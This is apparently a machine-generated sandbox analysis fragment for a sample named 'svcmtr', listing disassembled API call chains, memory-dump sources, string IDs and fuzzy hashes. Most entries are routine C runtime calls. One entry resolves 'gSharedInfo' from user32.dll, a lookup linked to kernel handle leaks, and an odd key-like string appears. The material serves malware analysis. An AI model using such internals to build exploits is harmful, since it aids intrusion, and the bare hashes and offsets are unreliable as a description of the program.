                                                                                                                            • Instruction Fuzzy Hash: 9A31C2713141189BC714EF28EC46ABB77A8EF89311F40455FF942D62A0DB799910C7EA
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00436FA8,00000008,00427551,00000000,00000000,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104), ref: 0042745A
                                                                                                                            • __lock.LIBCMT ref: 0042748E
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(?,?,?,00427493,0000000D,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104,delete ), ref: 0042A4E5
                                                                                                                            • InterlockedIncrement.KERNEL32(0043A200,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104,delete ,?,00000000,00000104), ref: 0042749B
                                                                                                                            • __lock.LIBCMT ref: 004274AF
                                                                                                                            • ___addlocaleref.LIBCMT ref: 004274CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0042F1C2
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F1D3
                                                                                                                            • __getptd.LIBCMT ref: 0042F1E1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0042F476
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F019
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F027
                                                                                                                            • __getptd.LIBCMT ref: 0042F480
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F48E
                                                                                                                            • __getptd.LIBCMT ref: 0042F49C
                                                                                                                            • __getptd.LIBCMT ref: 0042F4A7
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0042F4CD
                                                                                                                              • Part of subcall function 0042F0B0: __CallSettingFrame@12.LIBCMT ref: 0042F0FC
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F591
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00426BD8
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __amsg_exit.LIBCMT ref: 00426BF8
                                                                                                                            • __lock.LIBCMT ref: 00426C08
                                                                                                                            • InterlockedDecrement.KERNEL32(?,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C25
                                                                                                                            • _free.LIBCMT ref: 00426C38
                                                                                                                            • InterlockedIncrement.KERNEL32(021A2BA8,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C71
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 00402CD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 1615890066-4289949731
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID: eirutyerg23895385tiyiruytyieye
                                                                                                                            • API String ID: 1357608183-3501311787
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0042F80E
                                                                                                                              • Part of subcall function 0042F769: ___BuildCatchObjectHelper.LIBCMT ref: 0042F79F
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0042F825
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0042F833
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00425279
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042BB22,?,00000001,?,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • _free.LIBCMT ref: 0042528C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00427359
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 00427370
                                                                                                                            • __amsg_exit.LIBCMT ref: 0042737E
                                                                                                                            • __lock.LIBCMT ref: 0042738E
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 004273A2
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401116
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: NULL$4C
                                                                                                                            • API String ID: 3728558374-1282692239
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll,0041ECE4,000000FC,774E267D), ref: 0041EBE5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,gSharedInfo), ref: 0041EBF8
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: gSharedInfo$user32.dll
                                                                                                                            • API String ID: 1646373207-999560209
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042BC3A
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0042BC6D
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004249F7,?,00000000,00000000,?,?,?,?,004249F7,00000000), ref: 0042BC9E
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004249F7,00000001,00000000,00000000,?,?,?,?,004249F7,00000000), ref: 0042BD0C
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00425433), ref: 0042AE2F
                                                                                                                            • __malloc_crt.LIBCMT ref: 0042AE5E
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042AE6B
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 237123855-0
                                                                                                                            • Opcode ID: 0a2c49793b4e950ebae8f017cd03119d5b1b093e3720a22f2e92b2e837536c3b
                                                                                                                            • Instruction ID: ffafe432d3a1be91cb3ed5c6755412eae5a65b651a6a46b981f985a5bc90e206
                                                                                                                            • Opcode Fuzzy Hash: 0a2c49793b4e950ebae8f017cd03119d5b1b093e3720a22f2e92b2e837536c3b
                                                                                                                            • Instruction Fuzzy Hash: 17F0E9777400309B8F316734BC468976728DBD53A434B442BFC01C3300F6284D8382AB
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 004243B6
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042BB22,?,00000001,?,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • std::exception::exception.LIBCMT ref: 004243EB
                                                                                                                            • std::exception::exception.LIBCMT ref: 00424405
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00424416
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 615853336-0
                                                                                                                            • Opcode ID: bc9ba41937813b3dbd026a79dbbd0576eb7f8ee9a1da54fc8c8f8eca05588792
                                                                                                                            • Instruction ID: 3bc4eef493fb6e2109df5b93117a52ce0cabdca8b754fcba985a042c27bb8c7a
                                                                                                                            • Opcode Fuzzy Hash: bc9ba41937813b3dbd026a79dbbd0576eb7f8ee9a1da54fc8c8f8eca05588792
                                                                                                                            • Instruction Fuzzy Hash: 6EF0F971B00129A6CB04EF16FC02B5E7AB8EF40718F94501BF90496191DB7D8A418B8C
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004029C8
                                                                                                                            • _memmove.LIBCMT ref: 00402A14
                                                                                                                              • Part of subcall function 00402C20: std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 2168136238-2556327735
                                                                                                                            • Opcode ID: e1e3cb0c94402b65691bb4b10425518fcb46b1a13ca8f4197677c659613211aa
                                                                                                                            • Instruction ID: 05e0c882fe5706ff57867631edca58e8bcb26a3d6a6b88c2d51c5a980bb1849a
                                                                                                                            • Opcode Fuzzy Hash: e1e3cb0c94402b65691bb4b10425518fcb46b1a13ca8f4197677c659613211aa
                                                                                                                            • Instruction Fuzzy Hash: 9F2187B13046504BE635895C9B88A2BF7E9EB91714F60093BF1919B7C1C7BA9C40C7AD
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402864
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 004028AC
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 1785806476-2556327735
                                                                                                                            • Opcode ID: 3f3b75596b5596ee1fc97a02d26561cdb2c5fd69162b064814ec8ce18fdc641e
                                                                                                                            • Instruction ID: a87e7afb56152db4844304120ccc90d2fc77c79901bbf4eb6c8e40b04049be80
                                                                                                                            • Opcode Fuzzy Hash: 3f3b75596b5596ee1fc97a02d26561cdb2c5fd69162b064814ec8ce18fdc641e
                                                                                                                            • Instruction Fuzzy Hash: 1F110A371042105FEB24AD78A9C492BB798AB51324F204B3FE043926C1D7B9A84883A8
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027C5
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027D8
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 963545896-2556327735
                                                                                                                            • Opcode ID: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction ID: 064f40435e796dd26839fa1375d31275acd9165a4ba9a5abda85382cd89090f1
                                                                                                                            • Opcode Fuzzy Hash: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction Fuzzy Hash: E811963A3047408BC3219E2CA944A16BBA5EBE2721F20467FE591977C1C7BAD805C3B9
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402D5F
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • memmove.NTDLL(?,?,?,BFDB272D,?,00402C55,00000004,?,?,?,004029B9,?,?,?,?,004010F4), ref: 00402D94
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 00402D5A
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 1659287814-1799206989
                                                                                                                            • Opcode ID: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction ID: 1e4575317af22723dfc90c34203210abb019d66f2972e1f8230296fd7d489ede
                                                                                                                            • Opcode Fuzzy Hash: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction Fuzzy Hash: C201A2303007018BD7258E6CEE98A2AB7F6AFC5745B24093ED081D77C9D7B9DC428798
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: $gj
                                                                                                                            • API String ID: 2102423945-3974221788
                                                                                                                            • Opcode ID: 475b1b053e13befe42de15525320169b84c59ce0480073a8618cd8312f60fc88
                                                                                                                            • Instruction ID: d25502b6da0a0b66c229d91c22a28d008414b337d080cb476d7c62a5e50183e0
                                                                                                                            • Opcode Fuzzy Hash: 475b1b053e13befe42de15525320169b84c59ce0480073a8618cd8312f60fc88
                                                                                                                            • Instruction Fuzzy Hash: 6B016D76D0021C9BDB20EFA9D8416DDFB78AB49744F60425EE8147B342CB755906CFC9
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402BC0
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • memmove.NTDLL(00000000,00000000,?,?,?,?,00402953,?,?,00000000,004011DD,BFDB272D), ref: 00402BE1
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1659287814-3788999226
                                                                                                                            • Opcode ID: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction ID: 10d1b064c231672210bfe90d05fe3dc5ef501a4c2abe29e0a963277fe7030e2b
                                                                                                                            • Opcode Fuzzy Hash: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction Fuzzy Hash: 03F06D712006055FD310DF69E98592AB7E9EF44305710452EE5A6D3691E774F9408668
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F064
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F074
                                                                                                                            • __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F591
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction ID: e75760c1bfef3e269cdcdd64ebb75afa0e19efd270901459a5b22df1476f12ef
                                                                                                                            • Opcode Fuzzy Hash: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction Fuzzy Hash: FB012874A00225ABCF349F62E450AAEB3F5AF14315FD4483FE44196792DB3899C9CB49
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0042951F
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(?,?,?,00427493,0000000D,?,00000000,00425712,00424E4C,?,00000000,?,0041D3E8,?,00000104,delete ), ref: 0042A4E5
                                                                                                                            • EnterCriticalSection.KERNEL32(?,XgC,004298D7,00000001,?,00436FF8,00000010,00424C68,00436E68,0000000C,00424D04,?,XgC,00000080,756F3475), ref: 00429538
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
